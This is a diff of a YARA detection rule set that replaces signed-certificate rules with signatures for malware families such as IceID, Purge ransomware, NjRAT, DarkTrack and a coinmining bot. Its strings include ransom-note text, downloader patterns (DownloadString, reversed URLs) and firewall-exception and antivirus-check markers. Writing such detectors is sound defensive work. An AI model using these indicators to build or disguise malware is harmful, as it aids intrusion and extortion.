 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7adb9190be4a9cf60adf4b55c8abaa80e01224ea834fc05705afef37703899e"
+		logic_hash = "b9dd2446eddff18be00feb34d8911600feb395a9ce2566786d42b48b444230d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2afcc4cdee842d80bf7b6406fb503957c8a09b4d"
-		importance = 20
+
+	strings:
+		$s1 = "main.downloadFile" fullword ascii
+		$s2 = "main.fetchFiles" fullword ascii
+		$s3 = "main.createDefenderAllowanceException" fullword ascii
+		$s4 = "main.unzip" fullword ascii
+		$s5 = "HideWindow" fullword ascii
+		$s6 = "/go/src/installwrap/main.go" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA8\\x9C\\xE8\\xBF\\xAA\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xA8\\x9C\\xE5\\x93\\xA6\\xE5\\xB0\\xBA\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xB0\\xBA\\xE5\\xB0\\xBA\\xE8\\xBF\\xAA\\xE5\\x93\\xA6\\xE8\\xBF\\xAA\\xE5\\x8B\\x92\\xD0\\x91\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xD0\\x91" and pe.signatures [ i ] . serial == "35:33:08:0b:37:7f:80:c0:ea:82:6b:24:92:bf:76:7b" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B0Ecd32F95F8761B8A6D5710C7F34590 : FILE
+rule DITEKSHEN_MALWARE_Win_Blackmoon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables using BlackMoon RunTime"
 		author = "ditekSHen"
-		id = "2535c9eb-ed4a-52b9-8ad5-80c44c035135"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "76071d36-3d2d-589c-8c3f-0ae60e69996e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1140-L1151"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5146-L5155"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c181dab1f39138c67650d6654353de2be29cdbf45e0f5235776d28d40194f24"
+		logic_hash = "05bfde8ec3a469df5707c195e25995ac6af730e8a1595b1a598276c024420be2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2e25e7e8abc238b05de5e2a482e51ed324fbaa76"
-		importance = 20
+
+	strings:
+		$s1 = "blackmoon" fullword ascii
+		$s2 = "BlackMoon RunTime Error:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x96\\xAF\\xD0\\xA8\\xD0\\xA8\\xE5\\xBC\\x97\\xE6\\xAF\\x94\\xE5\\xBC\\x97\\xD0\\xA8\\xE6\\xAF\\x94\\xD0\\xA8\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xD0\\xA8\\xE6\\x96\\xAF\\xE5\\xB0\\x94\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "00:b0:ec:d3:2f:95:f8:76:1b:8a:6d:57:10:c7:f3:45:90" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3A727248E1940C5Bf91A466B29C3B9Cd : FILE
+rule DITEKSHEN_MALWARE_Win_Iceid : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects IceID / Bokbot variants"
 		author = "ditekSHen"
-		id = "db43ed73-de46-526e-a255-137a4eaaedce"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0da94737-0f82-5892-a0eb-f9f3c0a114cc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1153-L1164"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5157-L5176"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0afeb50b36d0ca1adbd6cb3accccb3ee093434b8c0bd8b03ae70ecc45c7423b5"
+		logic_hash = "204b4c297806a36ca14bb3e659824f4eb49b18308af7090f0db1194705f1e2c9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "eeeb3a616bb50138f84fc0561d883b47ac1d3d3d"
-		importance = 20
+
+	strings:
+		$n1 = "POST" fullword wide
+		$n2 = "; _gat=" fullword wide
+		$n3 = "; _ga=" fullword wide
+		$n4 = "; _u=" fullword wide
+		$n5 = "; __io=" fullword wide
+		$n6 = "; _gid=" fullword wide
+		$n7 = "Cookie: __gads=" fullword wide
+		$s1 = "c:\\ProgramData" ascii
+		$s2 = "loader_dll_64.dll" fullword ascii
+		$s3 = "loader_dll_32.dll" fullword ascii
+		$s4 = "/?id=%0.2X%0.8X%0.8X%s" ascii
+		$s5 = "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x90\\x89\\xE5\\x90\\x89\\xD0\\x98\\xE5\\x90\\x89\\xD0\\x98\\xE4\\xB8\\x9D\\xE4\\xB8\\x9D" and pe.signatures [ i ] . serial == "3a:72:72:48:e1:94:0c:5b:f9:1a:46:6b:29:c3:b9:cd" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $n* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $n* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ce40906451925405D0F6C130Db461F71 : FILE
+rule DITEKSHEN_MALWARE_Win_Purge : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Purge ransomware"
 		author = "ditekSHen"
-		id = "5e858504-b1c4-579e-b0e8-f6cf4f434672"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b3fb9f38-ce12-5e0e-8908-3379b5da3497"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1166-L1177"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5178-L5201"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "02b03b18942cff20ddce429f7be7cc9e54dfbf4884c79c7438c9b9d4415c5b93"
+		logic_hash = "83d13eca69bc99539e47d6d29689edf2a4fcd2260c6e909582126a490eef8115"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "af79bbdb4fa0724f907343e9b1945ffffb34e9b3"
-		importance = 20
+
+	strings:
+		$n1 = "imagesave/imagesize.php" ascii
+		$n2 = "imageinfo.html" ascii
+		$n3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" ascii
+		$n4 = "Content-Type: application/x-www-form-urlencoded" ascii
+		$m1 = "YOUR_ID: %x%x" wide
+		$m2 = "Specially for your PC was generated personal" wide
+		$m3 = "which is on our Secret Server" wide
+		$m4 = "wait for a miracle and get your price" wide
+		$s1 = "%s\\SpyHunter Remove Ransomware" wide
+		$s2 = "$recycle.bin" fullword wide
+		$s3 = "TheEnd" fullword wide
+		$s4 = "%s\\HELP_DECRYPT_YOUR_FILES.TXT" fullword wide
+		$s5 = "%s.id_%x%x_email_" wide
+		$s6 = "scmd" fullword wide
+		$s7 = "process call create \"%s\"" wide
+		$s8 = "FinishEnds" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xD0\\xA5\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x96\\xAF\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xD0\\xA5\\xE6\\x96\\xAF\\xD0\\xA5\\xD0\\xA5\\xE6\\x96\\xAF\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x9D\\xB0" and pe.signatures [ i ] . serial == "00:ce:40:90:64:51:92:54:05:d0:f6:c1:30:db:46:1f:71" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $n* ) or 2 of ( $m* ) or ( 3 of ( $s* ) and ( 1 of ( $n* ) or 1 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E130D3537E0B7A4Dda47B4D6F95F9481 : FILE
+rule DITEKSHEN_MALWARE_Win_Njrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects NjRAT / Bladabindi / NjRAT Golden"
 		author = "ditekSHen"
-		id = "efcc63ba-51f9-5b16-a33d-05d536efa6c6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "078dea64-8f95-5939-a1fb-c0a888adcf0d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1179-L1190"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5203-L5220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c394a115fa3fbd7fb2838b61b3c439df3daa9aa44b1901d1740060df0539411e"
+		logic_hash = "92d535a7c7f361b7a0901d0b99427ebc82a69577bfea73c04a7f9d51d2054b36"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "89f9786c8cb147b1dd7aa0eb871f51210550c6f4"
-		importance = 20
+
+	strings:
+		$x1 = /Njrat\s\d+\.\d+\sGolden\s/ wide
+		$s1 = /\sfirewall\s(add|delete)\sallowedprogram/ wide
+		$s2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 (63|6b) 00 20 00 70 00 69 00 6e 00 67 }
+		$s3 = "Execute ERROR" wide
+		$s4 = "Download ERROR" wide
+		$s5 = "[kl]" fullword wide
+		$s6 = "UploadValues" fullword wide
+		$s7 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
+		$s8 = "HideM" fullword wide
+		$s9 = "No Antivirus" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xBC\\x8A\\xE6\\x96\\xAF\\xE8\\x89\\xBE\\xE4\\xBC\\x8A\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92" and pe.signatures [ i ] . serial == "00:e1:30:d3:53:7e:0b:7a:4d:da:47:b4:d6:f9:5f:94:81" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4Bec555C48Aada75E83C09C9Ad22Dc7C : FILE
+rule DITEKSHEN_MALWARE_Win_Darktrackrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects OzoneRAT / DarkTrack / DarkSky"
 		author = "ditekSHen"
-		id = "664b8f55-03f8-5f36-aaf7-60ee4e613af4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ef8675f8-f643-5948-a967-e4a9ce5ab89e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1192-L1203"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5222-L5245"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "de4562f70bbe25aa053f2476efca12b99cd4f2ee721df620d02d004bac2a59f9"
+		logic_hash = "2a831c0f7707864d8c9e9fa338085a52933869d8cfbdbe0d12715da301c12646"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a2be2ab16e3020ddbff1ff37dbfe2d736be7a0d5"
-		importance = 20
+
+	strings:
+		$x1 = "Klog.dat" ascii
+		$x2 = "I_AM_DT" ascii
+		$x3 = " Alien" ascii
+		$x4 = "Local Victim" ascii
+		$x5 = "Dtback\\AlienEdition\\Server\\SuperObject.pas" ascii
+		$x6 = "].encryptedUsername" ascii
+		$x7 = "].encryptedPassword" ascii
+		$x8 = { 49 41 4d [6] 44 41 52 [0-2] 4b [6] 44 54 41 43 4b }
+		$s1 = "AntiVirusProduct" ascii
+		$s2 = "AntiSpywareProduct" ascii
+		$s3 = "ConnectServer" ascii
+		$s4 = "ExecQuery" ascii
+		$s5 = "\\Drivers\\Etc\\Hosts" fullword ascii
+		$s6 = "BTMemoryLoadLibary: Get DLLEntyPoint" ascii
+		$s7 = "\\\\.\\SyserDbgMsg" fullword ascii
+		$s8 = "\\\\.\\SyserBoot" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xE5\\xB1\\x81\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE5\\x90\\x89\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE4\\xB8\\x9D\\xE5\\xB1\\x81" and pe.signatures [ i ] . serial == "4b:ec:55:5c:48:aa:da:75:e8:3c:09:c9:ad:22:dc:7c" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009356E0361Bcf983Ab14276C332F814E7 : FILE
+rule DITEKSHEN_MALWARE_Win_Godzilla : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Godzilla loader"
 		author = "ditekSHen"
-		id = "6b5966d7-59ab-5d8a-936e-71b937424234"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3384b844-6abf-5f94-a62b-7ebbdfe321bd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1205-L1216"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5247-L5265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e85adfa9c004a46fe6060a36def3f8387de1484eb9fc3ae935d00265da135eab"
+		logic_hash = "ff87fbaaf488ac69e06a03a7f8e5305ec114caa6271c25fa130033f50f0d9095"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f8bc145719666175a2bb3fcc62e0f3b2deccb030"
-		importance = 20
+
+	strings:
+		$x1 = "MSVBVM60.DLL" fullword ascii
+		$x2 = "Loginserver8" fullword ascii
+		$x3 = "Proflogger7" fullword ascii
+		$s1 = "Badgeless5" fullword ascii
+		$s2 = "Montebrasite3" fullword ascii
+		$s3 = "Atelomyelia4" fullword ascii
+		$s4 = "Xxencoded5" fullword ascii
+		$s5 = "Garneau2" fullword ascii
+		$s6 = "Hypostasis0" fullword ascii
+		$s7 = "Piarhemia4" fullword ascii
+		$s8 = "Foredestine8" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE5\\x90\\x89\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE6\\x9D\\xB0\\xE5\\x90\\x89\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "00:93:56:e0:36:1b:cf:98:3a:b1:42:76:c3:32:f8:14:e7" )
+		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E5D20477E850C9F35C5C47123Ef34271 : FILE
+rule DITEKSHEN_MALWARE_Win_UNK03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects unknown malware"
 		author = "ditekSHen"
-		id = "c8777008-b15f-58c8-9172-f54a4864d2cc"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b0711427-b6bf-5e4b-af36-9c752ead4d6c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1218-L1229"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5267-L5280"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "984f6dba8613ca43a9ffdcba63e57516bd2c6df02698b87aa4a080f89cc6abc0"
+		logic_hash = "f1a4be68206628c3addbce8b6bbc1f801e67632d4e6a6af1d45cdad833e9a991"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d11431836db24dcc3a17de8027ab284a035f2e4f"
-		importance = 20
+
+	strings:
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion" ascii
+		$s2 = "rundll32.exe C:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen %s" ascii
+		$s3 = "%s.jpg" ascii
+		$s4 = "%s\\sz.txt" ascii
+		$s5 = "ChromeSecsv9867%d7.exe" ascii
+		$s6 = "%s\\appl%c.jpg" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\x89\\xBE\\xE5\\x8B\\x92\\xD0\\x92\\xE8\\xB4\\x9D\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xE8\\xB4\\x9D\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\xB4\\x9D\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92" and pe.signatures [ i ] . serial == "00:e5:d2:04:77:e8:50:c9:f3:5c:5c:47:12:3e:f3:42:71" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C865D49345F1Ed9A84Bea40743Cdf1D7 : FILE
+rule DITEKSHEN_MALWARE_Win_UNK04 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects unknown malware (proxy tool)"
 		author = "ditekSHen"
-		id = "2ef45336-bb59-5510-af6f-29e41c9258b9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6a178f37-a9fd-5a83-a550-c6333342ac9b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1231-L1242"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5282-L5296"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1a43e85e8c8d254dc3ba48ee9be5c233818fd6137967cd0235e802a2de1f9564"
+		logic_hash = "ba6e5bbc1d094b23e3870af963503d1ccbcd56adc24126b4a38b77d4b88b4b67"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d5e8afa85c6bf68d31af4a04668c3391e48b24b7"
-		importance = 20
+
+	strings:
+		$x1 = "127.0.0.1/%d" fullword ascii
+		$x2 = "SYSTEM\\CurrentControlSet\\SERVICES\\PORTPROXY\\V4TOV4\\TCP" fullword ascii
+		$x3 = "%s rundll32.exe" fullword ascii
+		$s1 = "kxetray.exe" fullword ascii
+		$s2 = "ksafe.exe" fullword ascii
+		$s3 = "Mcshield.exe" fullword ascii
+		$s4 = "Miner.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB0\\x94\\xE5\\x93\\xA6\\xD0\\x93\\xE8\\x89\\xBE\\xE5\\xB1\\x81\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE7\\xBB\\xB4\\xE5\\x93\\xA6\\xE8\\x89\\xBE\\xE5\\xB0\\x94\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:c8:65:d4:93:45:f1:ed:9a:84:be:a4:07:43:cd:f1:d7" )
+		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_29F2093E925B7Fe70A9Ba7B909415251 : FILE
+rule DITEKSHEN_MALWARE_Win_Karkoff : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Karkoff"
 		author = "ditekSHen"
-		id = "51c21421-18e4-52df-8fe7-75db7141824c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7d2fe783-18b3-5d84-a9b5-e8e0b5a0db98"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1244-L1255"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5298-L5313"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b3c6a0571c096e431594d9331b3ae8127b02cc3cdf1e994a113026d77bbae4c"
+		logic_hash = "e9b6ba5be2b3cd0faa898347e57cee5a57b80b19842c3a1ddb42d620307c8b39"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f9fc647988e667ec92bdf1043ea1077da8f92ccc"
-		importance = 20
+
+	strings:
+		$x1 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
+		$x2 = "CMD.exe" fullword wide
+		$x3 = "Karkoff.ProjectInstaller.resources" fullword ascii
+		$s1 = /try\shttp(s)?\s(ip|domain)/ fullword wide
+		$s2 = "Reg cleaned!" fullword wide nocase
+		$s3 = "Content-Disposition: form-data; name=\"{1}\"" fullword wide
+		$s4 = "^[A-Fa-f0-9]{8}-([A-Fa-f0-9]{4}-){3}[A-Fa-f0-9]{12}$" fullword wide
+		$s5 = "new backdoor" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x99\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xE4\\xB8\\x9D\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "29:f2:09:3e:92:5b:7f:e7:0a:9b:a7:b9:09:41:52:51" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 4 of ( $s* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0889E4181E71B16C4A810Bee38A78419 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent09 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects known downloader agent"
 		author = "ditekSHen"
-		id = "e9ada9f1-4b52-5da6-ba82-3ea2625ccefd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "90f71ac7-19d9-5a8e-9830-df2f16e12c9b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1257-L1268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5315-L5328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2411f7ac79d18af295d77078c6e1c98c5a116ab24125c08946cb6ca09c28bc7b"
+		logic_hash = "9336507fa4bb9d3a6325d5e9caafc8c4e816a0166fded7d4e53e09a87628bc89"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "bce3c17815ec9f720ba9c59126ae239c9caf856d"
-		importance = 20
+
+	strings:
+		$h1 = "//:ptth" ascii wide nocase
+		$h2 = "//:sptth" ascii wide nocase
+		$s1 = "DownloadString" fullword ascii wide
+		$s2 = "StrReverse" fullword ascii wide
+		$s3 = "FromBase64String" fullword ascii wide
+		$s4 = "WebClient" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE5\\xBC\\x97\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE5\\x90\\xBE" and pe.signatures [ i ] . serial == "08:89:e4:18:1e:71:b1:6c:4a:81:0b:ee:38:a7:84:19" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $h* ) and all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C1Afabdaa1321F815Cdbb9467728Bc08 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminingbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects coinmining bot"
 		author = "ditekSHen"
-		id = "e7904179-672a-5668-8b6d-f7f7090678fb"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "df15bfbd-f531-5eaa-b160-ad8a1fbe992f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1270-L1281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5330-L5343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be637a192a90a35be9879d5e36fb3cf9a56ca4158329d6b1fad458e2d05e3d26"
+		logic_hash = "a307a6c9184e8f4068cfa89a8432ae017c8aab10b706ba065051f8749860c15c"
 		score = 75
